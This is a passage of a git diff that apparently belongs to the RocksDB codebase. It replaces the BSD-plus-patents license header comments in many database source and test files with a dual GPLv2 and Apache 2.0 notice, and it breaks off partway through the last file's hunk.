 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc
index cc209a91254..d4fe7e702f8 100644
--- a/db/db_impl_readonly.cc
+++ b/db/db_impl_readonly.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include "db/db_impl_readonly.h"

diff --git a/db/db_impl_readonly.h b/db/db_impl_readonly.h
index 0cc393d1286..9bdc95cc874 100644
--- a/db/db_impl_readonly.h
+++ b/db/db_impl_readonly.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #pragma once

diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc
index 4dfef1bad82..f52bce611a9 100644
--- a/db/db_impl_write.cc
+++ b/db/db_impl_write.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_info_dumper.cc b/db/db_info_dumper.cc
index c618ec4c67e..1668a1638ff 100644
--- a/db/db_info_dumper.cc
+++ b/db/db_info_dumper.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #ifndef __STDC_FORMAT_MACROS
 #define __STDC_FORMAT_MACROS
diff --git a/db/db_info_dumper.h b/db/db_info_dumper.h
index 95f8b4aed27..acff8f1b8f6 100644
--- a/db/db_info_dumper.h
+++ b/db/db_info_dumper.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #pragma once
 #include
diff --git a/db/db_inplace_update_test.cc b/db/db_inplace_update_test.cc
index f626488503c..c1f1b51e301 100644
--- a/db/db_inplace_update_test.cc
+++ b/db/db_inplace_update_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_io_failure_test.cc b/db/db_io_failure_test.cc
index 9c42856ff37..e93961c13d0 100644
--- a/db/db_io_failure_test.cc
+++ b/db/db_io_failure_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_iter.cc b/db/db_iter.cc
index a64a355e785..7a22f573f30 100644
--- a/db/db_iter.cc
+++ b/db/db_iter.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_iter.h b/db/db_iter.h
index ba5f7205e22..83352644059 100644
--- a/db/db_iter.h
+++ b/db/db_iter.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_iter_test.cc b/db/db_iter_test.cc
index 889d64bd124..1b7c13b06f3 100644
--- a/db/db_iter_test.cc
+++ b/db/db_iter_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include
 #include
diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc
index df09bccf760..90f43ea374d 100644
--- a/db/db_iterator_test.cc
+++ b/db/db_iterator_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_log_iter_test.cc b/db/db_log_iter_test.cc
index 84c8776a7a7..e7f94c4c423 100644
--- a/db/db_log_iter_test.cc
+++ b/db/db_log_iter_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_memtable_test.cc b/db/db_memtable_test.cc
index 1bf9a41c9c8..63d274f6ab5 100644
--- a/db/db_memtable_test.cc
+++ b/db/db_memtable_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include
 #include
diff --git a/db/db_merge_operator_test.cc b/db/db_merge_operator_test.cc
index 7c842ff840c..de286191064 100644
--- a/db/db_merge_operator_test.cc
+++ b/db/db_merge_operator_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include
 #include
diff --git a/db/db_options_test.cc b/db/db_options_test.cc
index 1d43f6b3c10..243748f9fa4 100644
--- a/db/db_options_test.cc
+++ b/db/db_options_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc
index d407624ebb3..b09fe1ffacc 100644
--- a/db/db_properties_test.cc
+++ b/db/db_properties_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc
index 99f61416c67..0288f80bdde 100644
--- a/db/db_range_del_test.cc
+++ b/db/db_range_del_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/db_test_util.h" #include "port/stack_trace.h" diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 644b765ef40..73c6fe8016d 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_statistics_test.cc b/db/db_statistics_test.cc index f7c054c5c1e..237a2c68141 100644 --- a/db/db_statistics_test.cc +++ b/db/db_statistics_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/db/db_table_properties_test.cc b/db/db_table_properties_test.cc index dcd6729f676..265e9cb2e1a 100644 --- a/db/db_table_properties_test.cc +++ b/db/db_table_properties_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_tailing_iter_test.cc b/db/db_tailing_iter_test.cc index fe2b048f3b9..d217828db9d 100644 --- a/db/db_tailing_iter_test.cc +++ b/db/db_tailing_iter_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. 
An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test.cc b/db/db_test.cc index 40e8e0accfd..70f54250ba9 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test2.cc b/db/db_test2.cc index b1e1da4e014..aa10789c851 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 8de51b18c55..7de6cff3e7a 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test_util.h b/db/db_test_util.h index 14d91ec2ed9..5fb3f0c81b7 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. 
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc
index 6b01b67e56d..c6334f8e067 100644
--- a/db/db_universal_compaction_test.cc
+++ b/db/db_universal_compaction_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_wal_test.cc b/db/db_wal_test.cc
index bb211cb34f7..461fe467391 100644
--- a/db/db_wal_test.cc
+++ b/db/db_wal_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_write_test.cc b/db/db_write_test.cc
index 42470990070..726f444fa16 100644
--- a/db/db_write_test.cc
+++ b/db/db_write_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/db/dbformat.cc b/db/dbformat.cc
index 2b299cd637e..20c54495aa0 100644
--- a/db/dbformat.cc
+++ b/db/dbformat.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/dbformat.h b/db/dbformat.h
index ff40ab015ac..0ffffc88f22 100644
--- a/db/dbformat.h
+++ b/db/dbformat.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/dbformat_test.cc b/db/dbformat_test.cc
index 884fdfda527..d96b5757afd 100644
--- a/db/dbformat_test.cc
+++ b/db/dbformat_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/deletefile_test.cc b/db/deletefile_test.cc
index 8624e84cfda..989c0c4118b 100644
--- a/db/deletefile_test.cc
+++ b/db/deletefile_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/event_helpers.cc b/db/event_helpers.cc
index a78c25caf54..1b79acb0f2c 100644
--- a/db/event_helpers.cc
+++ b/db/event_helpers.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "db/event_helpers.h"
diff --git a/db/event_helpers.h b/db/event_helpers.h
index 91b9e3ea6b1..674e6c5f6fc 100644
--- a/db/event_helpers.h
+++ b/db/event_helpers.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/db/experimental.cc b/db/experimental.cc
index ad5c140f849..45d4d70aa82 100644
--- a/db/experimental.cc
+++ b/db/experimental.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/experimental.h"
diff --git a/db/external_sst_file_basic_test.cc b/db/external_sst_file_basic_test.cc
index 72454112d02..534e8a0bf76 100644
--- a/db/external_sst_file_basic_test.cc
+++ b/db/external_sst_file_basic_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/db/external_sst_file_ingestion_job.cc b/db/external_sst_file_ingestion_job.cc
index 102ecbc05e9..58fa354463a 100644
--- a/db/external_sst_file_ingestion_job.cc
+++ b/db/external_sst_file_ingestion_job.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/db/external_sst_file_ingestion_job.h b/db/external_sst_file_ingestion_job.h
index 0215f59107b..2d0fadeed79 100644
--- a/db/external_sst_file_ingestion_job.h
+++ b/db/external_sst_file_ingestion_job.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/db/external_sst_file_test.cc b/db/external_sst_file_test.cc
index be31d4874a8..4a4e82e792d 100644
--- a/db/external_sst_file_test.cc
+++ b/db/external_sst_file_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/db/fault_injection_test.cc b/db/fault_injection_test.cc
index 5aa1bfdc20d..adfcb4db5a7 100644
--- a/db/fault_injection_test.cc
+++ b/db/fault_injection_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright 2014 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/file_indexer.cc b/db/file_indexer.cc
index 14134f4640e..abfa7cf4c68 100644
--- a/db/file_indexer.cc
+++ b/db/file_indexer.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/file_indexer.h b/db/file_indexer.h
index 3995c99edc2..1bef3aab0ca 100644
--- a/db/file_indexer.h
+++ b/db/file_indexer.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/file_indexer_test.cc b/db/file_indexer_test.cc
index 352bf36c0b4..5cd8c2d2cf6 100644
--- a/db/file_indexer_test.cc
+++ b/db/file_indexer_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
